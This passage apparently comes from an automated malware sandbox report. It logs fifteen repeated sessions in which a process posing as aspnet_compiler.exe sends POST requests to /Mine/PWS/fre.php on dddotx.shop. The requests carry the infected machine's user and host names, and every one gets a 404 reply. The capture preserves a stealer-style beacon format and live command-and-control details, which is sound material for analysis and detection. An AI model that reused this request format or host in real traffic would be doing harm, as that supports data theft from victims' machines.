              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Dc0eKRu3oFLXAXXcg5rARrFFW%2BnRB3PDovlES0eNAaRwQSATtF3Nz5Bf6MndH1RajZ9CYTIYsBYmIg3KfJiclAb2o%2B37nedEn4wkUKMucRnK2W3ndaVbRfyVYKAf1A%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8c89988d7c8543d9-EWR
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              97192.168.2.749802188.114.97.380720C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
              TimestampBytes transferredDirectionData
              Sep 25, 2024 10:20:36.483275890 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: dddotx.shop
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 925F43C2
              Content-Length: 165
              Connection: close
              Sep 25, 2024 10:20:36.488105059 CEST165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
              Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
              Sep 25, 2024 10:20:37.191843987 CEST567INHTTP/1.1 404 Not Found
              Date: Wed, 25 Sep 2024 08:20:37 GMT
              Content-Type: text/html; charset=UTF-8
              Connection: close
              Status: 404 Not Found
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hlH1SuVawJz9c0QLlwbrciqZo6hamSq1uBOUAvXoF%2B7wbikmWOkEc%2FlDb5oE8DEvnJUJ731SdQjaUq3OlHfThEkfGu35K831TW4f5Gwp59luQMlYJDMYRfs%2Beviy9w%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8c899892a9ffc337-EWR
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              98192.168.2.749803188.114.97.380720C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
              TimestampBytes transferredDirectionData
              Sep 25, 2024 10:20:37.342505932 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: dddotx.shop
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 925F43C2
              Content-Length: 165
              Connection: close
              Sep 25, 2024 10:20:37.347438097 CEST165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
              Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
              Sep 25, 2024 10:20:38.011996984 CEST601INHTTP/1.1 404 Not Found
              Date: Wed, 25 Sep 2024 08:20:37 GMT
              Content-Type: text/html; charset=UTF-8
              Connection: close
              Status: 404 Not Found
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=utpWafjgdT33PSeJv9PBPTrO8ppnfQ%2FsHsbdj9MI9Gb4DltL8%2FXMZPpmzK2N2TS5elL8JJn2iCjP7e7iUvxRRhIR3%2BltLj83wE%2BJivLWUW2OHSEv%2BL71ZBJcFxqUHw%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8c899897efd043f1-EWR
              alt-svc: h3=":443"; ma=86400
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              99192.168.2.749804188.114.97.380720C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
              TimestampBytes transferredDirectionData
              Sep 25, 2024 10:20:38.165472984 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: dddotx.shop
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 925F43C2
              Content-Length: 165
              Connection: close
              Sep 25, 2024 10:20:38.170705080 CEST165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
              Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
              Sep 25, 2024 10:20:38.830640078 CEST565INHTTP/1.1 404 Not Found
              Date: Wed, 25 Sep 2024 08:20:38 GMT
              Content-Type: text/html; charset=UTF-8
              Connection: close
              Status: 404 Not Found
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VNlHw6UCTZzfd0jbLW8bVW2x0RX5Cx%2B0NU9UWPL48iIwHSggQjv81Vg3VR6gRIaQHXdf04WCIoaQs43iPTgJnl2vi9qX0osuWCihXLevhda%2FqyPiqGuxD2aYTFDmvA%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8c89989d0d0d42d7-EWR
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              100192.168.2.749805188.114.97.380720C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
              TimestampBytes transferredDirectionData
              Sep 25, 2024 10:20:38.978502035 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: dddotx.shop
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 925F43C2
              Content-Length: 165
              Connection: close
              Sep 25, 2024 10:20:38.983344078 CEST165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
              Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
              Sep 25, 2024 10:20:39.656409979 CEST567INHTTP/1.1 404 Not Found
              Date: Wed, 25 Sep 2024 08:20:39 GMT
              Content-Type: text/html; charset=UTF-8
              Connection: close
              Status: 404 Not Found
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=P1502YAANubG45hwi3fZHV9Sh7MSxbejuV06sMcf7wg3Ue2%2BXUzes0yZVhibASG%2F3WvVV%2FHRZ0v8fwnkeBFLi00qG6pkV1HXtdLD9gYLUSWJtMGQYVJa5vZ8PXqxTw%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8c8998a22d374392-EWR
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              101192.168.2.749806188.114.97.380720C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
              TimestampBytes transferredDirectionData
              Sep 25, 2024 10:20:39.807084084 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: dddotx.shop
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 925F43C2
              Content-Length: 165
              Connection: close
              Sep 25, 2024 10:20:39.812510014 CEST165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
              Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
              Sep 25, 2024 10:20:40.523547888 CEST601INHTTP/1.1 404 Not Found
              Date: Wed, 25 Sep 2024 08:20:40 GMT
              Content-Type: text/html; charset=UTF-8
              Connection: close
              Status: 404 Not Found
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=93Oq53JWLIlwjNXlLWqb9uPPw%2B%2BWvdOUwDP1BB8zlaqyMm7SYK4Mpken6vWnuh0JPD8ic6B8TIpfXY37bZONk%2BF6c%2BVZpQgA0yx5lalTZFS%2FTkc5OhPyZ6zTltFXkA%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8c8998a74f9e42a5-EWR
              alt-svc: h3=":443"; ma=86400
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              102192.168.2.749807188.114.97.380720C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
              TimestampBytes transferredDirectionData
              Sep 25, 2024 10:20:40.674865961 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: dddotx.shop
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 925F43C2
              Content-Length: 165
              Connection: close
              Sep 25, 2024 10:20:40.679656029 CEST165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
              Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
              Sep 25, 2024 10:20:41.372648954 CEST569INHTTP/1.1 404 Not Found
              Date: Wed, 25 Sep 2024 08:20:41 GMT
              Content-Type: text/html; charset=UTF-8
              Connection: close
              Status: 404 Not Found
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=z61VtDw2Wvo1l3YFqOShQowtO04M%2B8UPW0Y7dlzs6ktHdVaJhscCwFSkTLpCes12J4F2A0%2BtnWiZv6HEy53Vkrw0JXbeXPJst8StWUA8dSlpyErWyWOr%2F3T1ZW%2FhLQ%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8c8998accb0e7d1c-EWR
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              103192.168.2.749808188.114.97.380720C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
              TimestampBytes transferredDirectionData
              Sep 25, 2024 10:20:41.527319908 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: dddotx.shop
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 925F43C2
              Content-Length: 165
              Connection: close
              Sep 25, 2024 10:20:41.532088995 CEST165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
              Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
              Sep 25, 2024 10:20:42.248594999 CEST567INHTTP/1.1 404 Not Found
              Date: Wed, 25 Sep 2024 08:20:42 GMT
              Content-Type: text/html; charset=UTF-8
              Connection: close
              Status: 404 Not Found
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hLIudn5PxlJJMKTx9fE7hd1p1HEnwTbKS4M5l%2FXRBLNr7iMGZCMOblWGCteP0VOYMCf9XMFuo7MG1t3%2BZDau0OZ2yruR9i0YCWSECcjeXOjXhCl%2BkRb3J8jSjxfjYQ%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8c8998b228dd7281-EWR
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              104192.168.2.749809188.114.97.380720C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
              TimestampBytes transferredDirectionData
              Sep 25, 2024 10:20:42.402154922 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: dddotx.shop
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 925F43C2
              Content-Length: 165
              Connection: close
              Sep 25, 2024 10:20:42.407099009 CEST165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
              Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
              Sep 25, 2024 10:20:43.044941902 CEST569INHTTP/1.1 404 Not Found
              Date: Wed, 25 Sep 2024 08:20:43 GMT
              Content-Type: text/html; charset=UTF-8
              Connection: close
              Status: 404 Not Found
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZNSAGjfccAqxPfVdIS0Vv0aphrP%2BbIYycm6J1Ix1Honq2ztU4T%2BbNFc8iJcryd7FXZXFiaIMf4nuXKf%2B%2BEobSFOIkRFGUJvvghV7OnuSI7CZ4eAuq3b0dt3HNgO8yQ%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8c8998b788687cff-EWR
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              105192.168.2.749810188.114.97.380720C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
              TimestampBytes transferredDirectionData
              Sep 25, 2024 10:20:43.196113110 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: dddotx.shop
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 925F43C2
              Content-Length: 165
              Connection: close
              Sep 25, 2024 10:20:43.201045990 CEST165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
              Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
              Sep 25, 2024 10:20:43.854548931 CEST569INHTTP/1.1 404 Not Found
              Date: Wed, 25 Sep 2024 08:20:43 GMT
              Content-Type: text/html; charset=UTF-8
              Connection: close
              Status: 404 Not Found
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XQKMpWg0eXPNmPQ0NtRTlXYGo8jh%2FHEeEtkG16temtj8S%2BBaLV%2FW7toPlydc51gUXAeN1mPeyFZSgsu7ODHZyWWg2xODuqJe2iz9uQ8R%2FraNu1EHICv59YZW2pwb5A%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8c8998bc9d1742a5-EWR
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              106192.168.2.749811188.114.97.380720C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
              TimestampBytes transferredDirectionData
              Sep 25, 2024 10:20:44.015618086 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: dddotx.shop
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 925F43C2
              Content-Length: 165
              Connection: close
              Sep 25, 2024 10:20:44.020697117 CEST165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
              Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
              Sep 25, 2024 10:20:44.684386015 CEST567INHTTP/1.1 404 Not Found
              Date: Wed, 25 Sep 2024 08:20:44 GMT
              Content-Type: text/html; charset=UTF-8
              Connection: close
              Status: 404 Not Found
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=R92%2FKfjNwZHmAHiJpqB5SJOV7DT62nePq26wPMXBDv6ukIgXiHcCLrrzD9w1bcFSL7XBQk22Vdp1ecpMMwRcyFhDNlzAsiaDfOVYqkrLEAnk%2BEg%2BsYYdQ5910zfSbA%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8c8998c1b8f25e78-EWR
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              107192.168.2.749812188.114.97.380720C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
              TimestampBytes transferredDirectionData
              Sep 25, 2024 10:20:44.838891029 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: dddotx.shop
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 925F43C2
              Content-Length: 165
              Connection: close
              Sep 25, 2024 10:20:44.843940020 CEST165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
              Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
              Sep 25, 2024 10:20:45.502173901 CEST565INHTTP/1.1 404 Not Found
              Date: Wed, 25 Sep 2024 08:20:45 GMT
              Content-Type: text/html; charset=UTF-8
              Connection: close
              Status: 404 Not Found
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=o5L8WORFOBBkAkjRTHmov8FdEyO3vV5CB7RZZV9vUjkzWdb8VYK9hhWHqd2%2Fbz08EGvvXn1CTxD20q20F4aexqkkQnYcf8pok4oOz9X6%2Be7nH4YKz3BLctRJkwlhGg%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8c8998c6de9a8c12-EWR
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              108192.168.2.749813188.114.97.380720C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
              TimestampBytes transferredDirectionData
              Sep 25, 2024 10:20:45.762470007 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: dddotx.shop
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 925F43C2
              Content-Length: 165
              Connection: close
              Sep 25, 2024 10:20:45.767834902 CEST165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
              Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
              Sep 25, 2024 10:20:46.424729109 CEST569INHTTP/1.1 404 Not Found
              Date: Wed, 25 Sep 2024 08:20:46 GMT
              Content-Type: text/html; charset=UTF-8
              Connection: close
              Status: 404 Not Found
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vpLViIHoc53tjJCFDg%2BGODomOLKqGBRp51ZuKPmpF4KkVC7NLhWceZ9ufQgTZc5g%2FSCB8NaDApGsTFavpJ%2BvItBoxS2bdN%2FSH4JNkbRuOpAltFgVb2NCq9bXkhi9LQ%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8c8998cc6bdd8cbd-EWR
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              109192.168.2.749814188.114.97.380720C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
              TimestampBytes transferredDirectionData
              Sep 25, 2024 10:20:46.577153921 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: dddotx.shop
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 925F43C2
              Content-Length: 165
              Connection: close
              Sep 25, 2024 10:20:46.581998110 CEST165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
              Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
              Sep 25, 2024 10:20:47.221939087 CEST569INHTTP/1.1 404 Not Found
              Date: Wed, 25 Sep 2024 08:20:47 GMT
              Content-Type: text/html; charset=UTF-8
              Connection: close
              Status: 404 Not Found
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BFSXSNRJv3RBkcQT3HQ4NSLO7S7OIOS981Ef9C7rqEzf5Oci7RAohTjTHcFXOe4Zlhfq6kjEwSeZovga2rRAUovyDn5kgYKGKzxnaH%2BtWwOig%2FhCqS8JV3X66L%2BWNQ%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8c8998d19be841d2-EWR
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              110192.168.2.749815188.114.97.380720C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
              TimestampBytes transferredDirectionData
              Sep 25, 2024 10:20:47.379018068 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: dddotx.shop
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 925F43C2
              Content-Length: 165
              Connection: close
              Sep 25, 2024 10:20:47.383984089 CEST165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
              Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
              Sep 25, 2024 10:20:48.049494982 CEST573INHTTP/1.1 404 Not Found
              Date: Wed, 25 Sep 2024 08:20:48 GMT
              Content-Type: text/html; charset=UTF-8
              Connection: close
              Status: 404 Not Found
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3blxiqZv7%2BHAjoBK8RwY0e2%2FzSvy7abL%2BIcd1talAjK23czk0g4mYtOhzK%2Bh%2FUcYBTXIStrFXbdPtosp4XM63vmhTceVdmm5LS00%2BfaLsjDObBkOmIX89j1wDUiEhQ%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8c8998d69fef5e5f-EWR
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              111192.168.2.749816188.114.97.380720C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
              TimestampBytes transferredDirectionData
              Sep 25, 2024 10:20:48.340497017 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: dddotx.shop
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 925F43C2
              Content-Length: 165
              Connection: close
              Sep 25, 2024 10:20:48.345315933 CEST165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
              Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
              Sep 25, 2024 10:20:49.020461082 CEST563INHTTP/1.1 404 Not Found
              Date: Wed, 25 Sep 2024 08:20:48 GMT
              Content-Type: text/html; charset=UTF-8
              Connection: close
              Status: 404 Not Found
              CF-Cache-Status: DYNAMIC
